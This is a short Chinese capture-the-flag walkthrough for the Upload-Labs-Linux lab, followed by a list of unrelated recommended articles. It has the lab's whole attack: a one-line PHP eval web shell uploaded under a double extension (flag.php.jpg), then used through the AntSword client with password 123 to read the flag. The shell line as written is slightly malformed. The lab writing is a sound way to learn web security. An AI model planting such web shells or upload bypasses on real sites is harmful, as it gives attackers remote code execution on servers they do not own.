Upload-Labs-Linux

题目

1.打开靶机

随便上传一个图片,查看get请求发现**/upload/XXX.jpg**

2.创建一个脚本文件

命名为flag.php.jpg,并上传

脚本文件内容:

<?php @eval($_POST1234)?>

3上传后复制文件get请求的链接并打开蚁剑

连接密码为123

双击链接

4,查找'/'在最下面找到flag文件

5,打开文件得到flag

相关推荐
学逆向的3 小时前
汇编——位运算
开发语言·汇编·算法·网络安全
数据知道4 小时前
安全报告怎么写才专业:渗透测试报告模板与踩坑
安全·网络安全·漏洞修复·安全报告·渗透测试报告
福来阁86号技师6 小时前
2026-now 网络安全笔记
网络安全·ctf·awd
编程(变成)小辣鸡8 小时前
如何防止接口被恶意刷?
java·后端·网络安全
ylscode15 小时前
OpenSSH 10.4 正式发布:后量子加密落地,多项高危漏洞得到修复
网络·安全·网络安全
HackTwoHub1 天前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
ccino .1 天前
Hackerone-地址栏xss
网络安全·xss
数据知道1 天前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全
txg6661 天前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
红信鸽1 天前
2026 年 AI 钓鱼攻击现状与防御深度解析
网络安全